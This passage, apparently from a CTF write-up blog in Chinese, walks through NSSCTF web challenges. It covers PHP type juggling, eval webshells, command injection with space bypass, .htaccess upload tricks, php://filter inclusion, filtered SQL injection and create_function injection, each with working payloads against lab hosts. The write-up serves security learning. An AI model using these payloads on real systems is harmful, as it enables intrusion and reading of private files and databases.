1.easy_md5</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line"> highlight_file(__FILE__);</span><br><span class="line"> include &#x27;flag2.php&#x27;;</span><br><span class="line"></span><br><span class="line">if (isset($_GET[&#x27;name&#x27;]) &amp;&amp; isset($_POST[&#x27;password&#x27;]))&#123;</span><br><span class="line">  $name = $_GET[&#x27;name&#x27;];</span><br><span class="line">  $password = $_POST[&#x27;password&#x27;];</span><br><span class="line">  if ($name != $password &amp;&amp; md5($name) == md5($password))&#123;</span><br><span class="line">    echo $flag;</span><br><span class="line">  &#125;</span><br><span class="line">  else &#123;</span><br><span class="line">    echo &quot;wrong!&quot;;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">else &#123;</span><br><span class="line">  echo &#x27;wrong!&#x27;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>本题是利用了<strong>MD5哈希比较漏洞</strong>，条件要求：</p><ol><li><code>name</code> (GET参数) 和 <code>password</code> (POST参数) <strong>值不相等</strong></li><li>但它们的 <strong>MD5哈希值相等</strong>（使用<code>==</code>弱类型比较）</li></ol><p>攻击原理：</p><p>当比较0e开头的字符串时，php会将其视为科学计数法的0；</p><p>eg.<code>0e123456</code> == <code>0e987654</code> 会被视为 <code>0 == 0</code>，返回true;</p><p>因此，此题便看明白了，我们只需要分别搞一个0e开头的字符串给name和password参数，便可；</p><p>于是我们用burpsuite抓包(用hackbar更快点)，改成这样就能拿到flag；</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">POST /?name=QNKCDZO HTTP/1.1</span><br><span class="line">Host: node7.anna.nssctf.cn:23851</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line">Accept-Encoding: gzip, deflate, br</span><br><span class="line">Connection: keep-alive</span><br><span class="line">Content-Length: 18</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">password=240610708</span><br></pre></td></tr></table></figure><p>当然，本题还可以使用数组绕过。</p><p>原理:MD5不能加密数组，传入数组会报错，但是会继续执行返回结果null，==为弱类型比较，判断为相等，因此打开hackbar输入</p><p>/?name[]=123  password[]=456 也可以得到flag。</p><h3 id="2caidao"><a class="markdownIt-Anchor" href="#2caidao"></a> 2.caidao</h3><p>本题一打开来只有一张图片，图片上写的是一句话木马的一部分，表明服务器可以执行通过POST请求传入的参数为wllm的命令。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">@eval($_POST[&#x27;wllm&#x27;]);</span><br></pre></td></tr></table></figure><p>我们使用Hackbar试试看，</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wllm=system(&#x27;ls&#x27;);</span><br></pre></td></tr></table></figure><p>查看源代码后发现有index.php;</p><p>因此我们看看根目录有什么：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wllm=system(&#x27;ls /&#x27;);</span><br></pre></td></tr></table></figure><p>看到目录里有flag，我们直接</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wllm=system(&#x27;cat /flag&#x27;);</span><br></pre></td></tr></table></figure><p>就拿到flag了；</p><p>本来想试试用蚁剑来做的，发现好像更复杂了doge。</p><h3 id="3babyrce"><a class="markdownIt-Anchor" href="#3babyrce"></a> 3.babyrce</h3><p>打开题目，一个php脚本，第一个脚本非常简单，添加新的要求的请求头并发送后，给我们一个文件rasalghul.php,</p><p>访问后看到另一个脚本，</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">error_reporting(0);</span><br><span class="line">if (isset($_GET[&#x27;url&#x27;])) &#123;</span><br><span class="line"> $ip=$_GET[&#x27;url&#x27;];</span><br><span class="line"> if(preg_match(&quot;/ /&quot;, $ip))&#123;</span><br><span class="line">   die(&#x27;nonono&#x27;);</span><br><span class="line"> &#125;</span><br><span class="line"> $a = shell_exec($ip);</span><br><span class="line"> echo $a;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>简单分析一下：</p><p>error_reporting(0);关闭错误报告，表明程序不会有任何错误提示；</p><p>highlight_file(<strong>FILE</strong>);输出当前脚本文件内容，突出显示语法结构。__FILE__作为魔法常量，表示脚本的绝对路径；</p><p>preg_match(“/ /”, $ip)；检查  $$ip变量值中是否存在空格，如果存在停止运行并输出nonono。</p><p>shell_exec($ip);函数通过shell命令执行变量并返回输出，可能会引发严重的安全问题；</p><p>echo $a;输出shell的结果。</p><p>对此，我们先试试看</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node5.anna.nssctf.cn:22593/rasalghul.php?url=ls</span><br></pre></td></tr></table></figure><p>发现有用，于是我们尝试空格绕过。$IFS</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node5.anna.nssctf.cn:22593/rasalghul.php?url=ls$IFS/</span><br></pre></td></tr></table></figure><p>回显得到flag文件，直接使用cat命令查看得到：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node5.anna.nssctf.cn:22593/rasalghul.php?url=cat$IFS/flllllaaaaaaggggggg</span><br></pre></td></tr></table></figure><p>flag:NSSCTF{90c1df99-8b8c-4068-b04a-521fffaeed8c}</p><h3 id="4webftp"><a class="markdownIt-Anchor" href="#4webftp"></a> 4.webftp</h3><p>非常简单，只需要/phpinfo.php就能拿到flag。</p><h3 id="5easypayload10比20难其实"><a class="markdownIt-Anchor" href="#5easypayload10比20难其实"></a> 5.easypayload1.0(比2.0难其实)</h3><p>和之前一样，jpg文件上传一句话木马，然后改后缀为php，蚁剑连接在www目录下找到flag：WLLMCTF{I_d0nt_w4nna_wak3up}；</p><p>但是很高兴这是假的，思索良久后，我们打开burpsuite使用post传参访问文件地址，传值为：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">123=phpinfo();</span><br></pre></td></tr></table></figure><p>其中123是一句话木马里的语句。</p><p>然后就按照经验从environment中找到flag：NSSCTF{484ee820-ec64-470a-9724-b258fffee540}</p><h3 id="6litctf-2023ping"><a class="markdownIt-Anchor" href="#6litctf-2023ping"></a> 6.[LitCTF 2023]Ping</h3><p>又是一道ping的题目</p><p>打开容器后，我们也是按照经验先试着ping一下127.0.0.1，发现能回显，于是试试</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1;ls</span><br></pre></td></tr></table></figure><p>发现弹出提示禁止ip之外的输入，这是JS的禁用，于是我们可以通过控制台写代码或者直接F12-F1禁用浏览器JS，然后就可以直接输入了，</p><p>返回index.php 和upload；</p><p>我们试试查看一下根目录:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1;ls /</span><br></pre></td></tr></table></figure><p>发现有flag，直接cat：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1;cat /flag</span><br></pre></td></tr></table></figure><p>得到flag。</p><h3 id="7swpuctf-2021-新生赛easyupload30"><a class="markdownIt-Anchor" href="#7swpuctf-2021-新生赛easyupload30"></a> 7.[SWPUCTF 2021 新生赛]easyupload3.0</h3><p>这题我们一打开先上手尝试一下，发现不能上传php文件，看到网站提示我们和其他文件一起上传，查询资料后发现可以用.htaccess文件。</p><p>htaccess文件负责相关目录下的网页配置，可以帮助我们实现：网页301重定向、自定义404错误页面，改变文件扩展名、允许/阻止特定的用户或者目录的访问，禁止目录列表，配置默认文档等功能。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;jpg&quot;&gt;</span><br><span class="line"></span><br><span class="line">  SetHandler application/x-httpd-php</span><br><span class="line"></span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></figure><p>以上就是一个.htaccess文件，这里作用是将jpg按php文件读取解析。</p><p><strong>注意：htaccess文件只能命名为.htaccess，前面不能有前缀！！！</strong></p><p>这里简单解释一下：</p><p>.htaccess是Apache服务器的硬性规定：Apache的配置文件中有一个指令叫 <code>AccessFileName</code>，它定义了分布式配置文件的名称。在绝大多数服务器的默认配置中，这个指令的值就是：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AccessFileName .htaccess</span><br></pre></td></tr></table></figure><p>这行代码明确告诉Apache：“请去每个目录下寻找一个叫 <strong><code>.htaccess</code></strong> 的文件，并读取其中的配置。” 因此，如果你把它改成其他名字，比如 <code>my.htaccess</code>，Apache在默认情况下就不会认出它，文件也就不会生效了。</p><p>接着再和之前一样搞一个一句话木马（轻车熟路了吧）</p><p>然后先上传.htaccess,再上传一句话木马，访问文件地址回显成功，说明一句话木马上传成功！</p><p>这里我们可以和之前一样用蚁剑连接，在flag.php下找到flag，也可以通过hackbar  POST</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">123=phpinfo();</span><br></pre></td></tr></table></figure><p>注：'123’是一句话木马的值。</p><p>在Environment中找到flag：</p><p>NSSCTF{667ccf7a-b317-4440-a5df-5edfe8567831}</p><h3 id="8鹏城杯-2022简单包含"><a class="markdownIt-Anchor" href="#8鹏城杯-2022简单包含"></a> 8.[鹏城杯 2022]简单包含</h3><p>本题的主要考点是php伪协议、文件包含、WAF绕过。</p><p>题目如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">include($_POST[&quot;flag&quot;]);</span><br><span class="line">//flag in /var/www/html/flag.php;</span><br></pre></td></tr></table></figure><p>看到这里，我们直接用hackbar进行POST传参flag=/var/www/html/flag.php,发现回显waf，</p><p>于是我们试试php伪协议，</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure><p>还是回显waf；</p><p>于是我们试试看看能否看看页面的</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag=php://filter/read=convert.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure><p>果然返回一串base64编码的数据，解码得到：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$path = $_POST[&quot;flag&quot;];</span><br><span class="line"></span><br><span class="line">if (strlen(file_get_contents(&#x27;php://input&#x27;)) &lt; 800 &amp;&amp; preg_match(&#x27;/flag/&#x27;, $path)) &#123;</span><br><span class="line">    echo &#x27;nssctf waf!&#x27;;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    @include($path);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;code&gt;&lt;span style=&quot;color: #000000&quot;&gt;</span><br><span class="line">&lt;span style=&quot;color: #0000BB&quot;&gt;&amp;lt;?php&amp;nbsp;&lt;br /&gt;highlight_file&lt;/span&gt;&lt;span style=&quot;color: #007700&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #0000BB&quot;&gt;__FILE__&lt;/span&gt;&lt;span style=&quot;color: #007700&quot;&gt;);&lt;br /&gt;include(&lt;/span&gt;&lt;span style=&quot;color: #0000BB&quot;&gt;$_POST&lt;/span&gt;&lt;span style=&quot;color: #007700&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #DD0000&quot;&gt;&quot;flag&quot;&lt;/span&gt;&lt;span style=&quot;color: #007700&quot;&gt;]);&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: #FF8000&quot;&gt;//flag&amp;nbsp;in&amp;nbsp;/var/www/html/flag.php;&lt;/span&gt;</span><br><span class="line">&lt;/span&gt;</span><br><span class="line">&lt;/code&gt;&lt;br /&gt;</span><br></pre></td></tr></table></figure><p>对于这一句：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if (strlen(file_get_contents(&#x27;php://input&#x27;)) &lt; 800 &amp;&amp; preg_match(&#x27;/flag/&#x27;, $path)) &#123;</span><br><span class="line">    echo &#x27;nssctf waf!&#x27;;</span><br></pre></td></tr></table></figure><p>我们发现请求体长度小于800会触发waf，于是我们构造payload：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">6=6666666666.........(以下省略800个6)&amp;flag=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure><p>成功得到PD9waHAgPSdOU1NDVEZ7ZGM2MzNlYzQtOTk2Yi00MzIwLTljYjctNDM0YTc2NWZlMGUyfSc7Cg==</p><p>解码得flag：NSSCTF{dc633ec4-996b-4320-9cb7-434a765fe0e2}</p><h3 id="9swpuctf-2021-新生赛sql"><a class="markdownIt-Anchor" href="#9swpuctf-2021-新生赛sql"></a> 9.[SWPUCTF 2021 新生赛]sql</h3><p>思路</p><ul><li>使用常规字符型的联合注入起手</li><li>通过弹窗，在每个语句中找到对应的过滤内容，替换过滤内容</li><li>发现显示只有开头，使用函数获取每一段flag</li></ul><p>writeup</p><ol><li><p>一开始在做闭合中发现<code>--+</code>被过滤，因为<code>+</code>表示空格；</p><p>使用<code>#</code>后发现无回显，考虑用url编码<code>%23</code>.</p></li><li><p>发现有回显位，因此用联合注入；</p></li><li><p>使用<code>order by</code>查询字段数时发现了空格过滤 =&gt; 使用<code>/**/</code>替换绕过；</p></li><li><p>联合注入查看回显，发现是2,3；</p></li><li><p>然后爆库：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27;union/**/select/**1,database(),3%23</span><br></pre></td></tr></table></figure></li><li><p>开始爆破表格名，使用<code>where table_name=&quot;&quot;</code>时发现了 <code>=</code> 过滤 =&gt; 使用like替换，即：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">where/**/table_name/**/like LFLF_flag</span><br></pre></td></tr></table></figure></li><li><p>同时发现<code>and</code>被过滤，直接限制表名，不要限制数据库即可；</p></li><li><p>得到字段后直接查字段，发现查询到的字数出现限制；</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1&#x27;/**/union/**/select/**/1,2,flag/**/from/**/LFLF_flag</span><br></pre></td></tr></table></figure></li><li><p>尝试使用right()函数，发现被过滤。</p></li><li><p>尝试使用mid()函数：</p></li></ol><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1&#x27;union/**/select/**/1,mid(flag,1,20),3/**/from/**/LTLT_flag%23</span><br><span class="line"></span><br><span class="line">?wllm=-1&#x27;union/**/select/**/1,mid(flag,21,20),3/**/from/**/LTLT_flag%23</span><br><span class="line"></span><br><span class="line">?wllm=-1&#x27;union/**/select/**/1,mid(flag,41,20),3/**/from/**/LTLT_flag%23</span><br></pre></td></tr></table></figure><p>从而得到flag。</p><h3 id="10鹤城杯-2021easyp"><a class="markdownIt-Anchor" href="#10鹤城杯-2021easyp"></a> 10.[鹤城杯 2021]EasyP</h3><p>这题主要考察正则绕过。</p><p>以下是源代码:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &#x27;utils.php&#x27;;</span><br><span class="line"></span><br><span class="line">if (isset($_POST[&#x27;guess&#x27;])) &#123;</span><br><span class="line">    $guess = (string) $_POST[&#x27;guess&#x27;];</span><br><span class="line">    if ($guess === $secret) &#123;</span><br><span class="line">        $message = &#x27;Congratulations! The flag is: &#x27; . $flag;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        $message = &#x27;Wrong. Try Again&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if (preg_match(&#x27;/utils\.php\/*$/i&#x27;, $_SERVER[&#x27;PHP_SELF&#x27;])) &#123;</span><br><span class="line">    exit(&quot;hacker :)&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if (preg_match(&#x27;/show_source/&#x27;, $_SERVER[&#x27;REQUEST_URI&#x27;]))&#123;</span><br><span class="line">    exit(&quot;hacker :)&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if (isset($_GET[&#x27;show_source&#x27;])) &#123;</span><br><span class="line">    highlight_file(basename($_SERVER[&#x27;PHP_SELF&#x27;]));</span><br><span class="line">    exit();</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure><p>这里解释一下里面新的东西：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$_SERVER[...]：是一个包含了诸如头信息（header）、路径（path）、以及脚本位置（script locations）等信息的数组。根据中括号内传入的参数不同，返回不同的信息，下面是题目涉及的两个参数：</span><br><span class="line">&#x27;PHP_SELF&#x27;：返回当前执行脚本的文件名。例如：在地址为http://example.com/foo/bar.php的脚本中使用 $_SERVER[&#x27;PHP_SELF&#x27;] 将得到 /foo/bar.php</span><br><span class="line">&#x27;REQUEST_URI&#x27;：取得当前URL的路径地址，感觉跟上面那个没啥区别</span><br><span class="line">basename()：返回路径中的文件名部分</span><br></pre></td></tr></table></figure><p>第一个if，当POST传入的参数<code>$guest</code>等于<code>$secret</code>时返回flag，但这里不知道<code>$secret</code>；</p><p>第二个if，检查当前执行脚本的文件名，从后往前若找到<code>utils.php</code>则过滤掉；</p><p>第三个if，检查当前URL的路径地址，若出现<code>show_source</code>则过滤掉；</p><p>第四个if，检查<code>show_source</code>是否有定义。</p><p><strong>先考虑第二个if语句，我们在<code>utils.php</code>后面加一个非ascii字符即可（从后往前找，遇到非ascii字符就停）</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if (preg_match(&#x27;/utils\.php\/*$/i&#x27;, $_SERVER[&#x27;PHP_SELF&#x27;])) &#123;</span><br><span class="line">    exit(&quot;hacker :)&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在正则表达式中，<code>$</code> 表示<strong>字符串的结尾</strong>。所以从后往前找。</p><p>再考虑第三个语句：</p><p><strong>这里我们要知道一个规则：GET或POST方式传进去的变量名,会自动将<code>空格 + . [</code>转换为<code>_</code></strong></p><p><strong>所以这里我们传入<code>show[source</code>先通过第三个if，在第四个if中GET传参的时候会转换回<code>_</code></strong></p><p>因此得到payload：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php/utils.php/原神牛不牛逼?show[source=1</span><br></pre></td></tr></table></figure><p>得到flag：NSSCTF{c019aad9-b2c2-40b4-8609-af0985d138bc}</p><h3 id="11nisactf-2022bingdundun~"><a class="markdownIt-Anchor" href="#11nisactf-2022bingdundun~"></a> 11.[NISACTF 2022]bingdundun~</h3><p>又是一道upload题目~</p><p>这题没有什么很难的，就是一句话木马改成zip文件上传，主要问题就在最后访问的URL这里:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node5.anna.nssctf.cn:25522/?bingdundun=phar://aefd03aa3501ef85fca59ffb7394f8dd.zip/upload</span><br></pre></td></tr></table></figure><p>upload这里是一句话木马的文件名，不是连接密码，然后再用蚁剑连接即可。</p><p>ps:但是我不明白为什么php文件通过burpsuite改后缀为zip，蚁剑返回数据为空QAQ</p><h3 id="12gkctf-2021easycms"><a class="markdownIt-Anchor" href="#12gkctf-2021easycms"></a> 12.[GKCTF 2021]easycms</h3><p>豪豪豪题</p><p>一打开来我们看到了一个蝉知企业门户平台，看来似乎要我们找到flag，于是我们考虑用御剑扫描工具(也可以用dereseaech)，扫描出</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://node4.anna.nssctf.cn:20408/data/</span><br><span class="line">http://node4.anna.nssctf.cn:20408/admin.php</span><br><span class="line">http://node4.anna.nssctf.cn:20408/index.php</span><br></pre></td></tr></table></figure><p>三个响应200的网址，依据经验，admin页面藏有flag的概率最大。</p><p>点进去果然要输入密码，我们采用爆破，得到密码为12345，嘿嘿弱密钥也可以直接猜就是了QAQ</p><p>进去以后我们一番搜寻，发现里面有自定义主题，我们试着导出主题，然后复制文件下载地址看看(ps:当时解题到一半被拉去吃饭了，回来只能重开一个容器QAQ)</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node4.anna.nssctf.cn:27312/admin.php?m=ui&amp;f=downloadtheme&amp;theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMWIuemlw </span><br></pre></td></tr></table></figure><p>把后面base64解码看看，发现是文件的绝对地址/var/www/html/system/tmp/theme/default/1b.zip；</p><p>于是我们把后面改为/flag,用base64编码得到</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node4.anna.nssctf.cn:27312/admin.php?m=ui&amp;f=downloadtheme&amp;theme=L2ZsYWc=</span><br></pre></td></tr></table></figure><p>得到flag.zip;发现直接打不开，用010editor打开</p><p>最终得到flag:NSSCTF{aeb3f2be-0e96-4cf5-bea1-ffdbdf607c62}</p><p>弯弯绕绕终于解完，看了看网上的writeup，发现还有神奇做法，相当nb：</p><p>01.我们进入admin自定义主题页面，进入自定义，我们看到里面的编辑项目存在“php” ，于是我们可以试着在上面写入简单木马</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php system(&quot;cat /flag&quot;);?&gt;</span><br></pre></td></tr></table></figure><p>但是却返回需要验证管理员权限；不知道为什么，别人在这里就可以直接浏览页面得到flag了emmmmmm</p><p>但是返回的信息也有用，我们直接利用名称进行目录穿越<br />…/…/…/…/…/…/system/tmp/xdwe；</p><p>保存后页面直接显示flag！！！</p><h3 id="13nisactf-2022level-up"><a class="markdownIt-Anchor" href="#13nisactf-2022level-up"></a> 13.[NISACTF 2022]level-up</h3><p>前面几关都比较简单，不细说。</p><p>这里主要讲最后一层：</p><p>看了大佬的WP才知道这一关用的是create_function</p><p>这里简单说一下：</p><blockquote><p>create_function(string a, string b)会创造一个匿名函数，传入的两个参数均为字符串</p><p>其中，字符串a中表示函数需要传入的参数，字符串b表示函数中的执行语句</p><p>例如，create_function(‘$a’, ‘echo(“hello”);’)，我们需要把它看作：</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">niming</span>(<span class="params"><span class="variable">$a</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">&quot;hello&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></blockquote><p>因为<code>create_function</code>自带eval命令执行，因此我们需要传入<code>$a</code>为<code>\create_function</code>；</p><p>而对于参数<code>$b</code>，我们需要让它执行system()函数，用于回显flag，因此传入<code>$b</code>为<code>}system('cat /flag');//</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/55_5_55.php?a=\create_function&amp;b=&#125;system(&#x27;cat /flag&#x27;);//</span><br></pre></td></tr></table></figure><p>为什么这个payload能够生效呢？</p><p>我们知道<code>create_function</code>会创造匿名函数，而payload的}会将该函数闭合，然后执行system(‘cat /flag’);</p><p>最后<code>//</code>把最后的}注释掉，至此已成艺术()</p><p><code>\</code>因为参数a做正则，从后往前。</p><h3 id="14moectf-2022ezphp"><a class="markdownIt-Anchor" href="#14moectf-2022ezphp"></a> 14.[MoeCTF 2022]ezphp</h3><p>本题考察的内容是变量覆盖</p><p>源代码如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">highlight_file(&#x27;source.txt&#x27;);</span><br><span class="line">echo &quot;&lt;br&gt;&lt;br&gt;&quot;;</span><br><span class="line"></span><br><span class="line">$flag = &#x27;xxxxxxxx&#x27;;</span><br><span class="line">$giveme = &#x27;can can need flag!&#x27;;</span><br><span class="line">$getout = &#x27;No! flag.Try again. Come on!&#x27;;</span><br><span class="line">if(!isset($_GET[&#x27;flag&#x27;]) &amp;&amp; !isset($_POST[&#x27;flag&#x27;]))&#123;</span><br><span class="line">  exit($giveme);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if($_POST[&#x27;flag&#x27;] === &#x27;flag&#x27; || $_GET[&#x27;flag&#x27;] === &#x27;flag&#x27;)&#123;</span><br><span class="line">  exit($getout);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">foreach ($_POST as $key =&gt; $value) &#123;</span><br><span class="line">  $$key = $value;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">foreach ($_GET as $key =&gt; $value) &#123;</span><br><span class="line"> 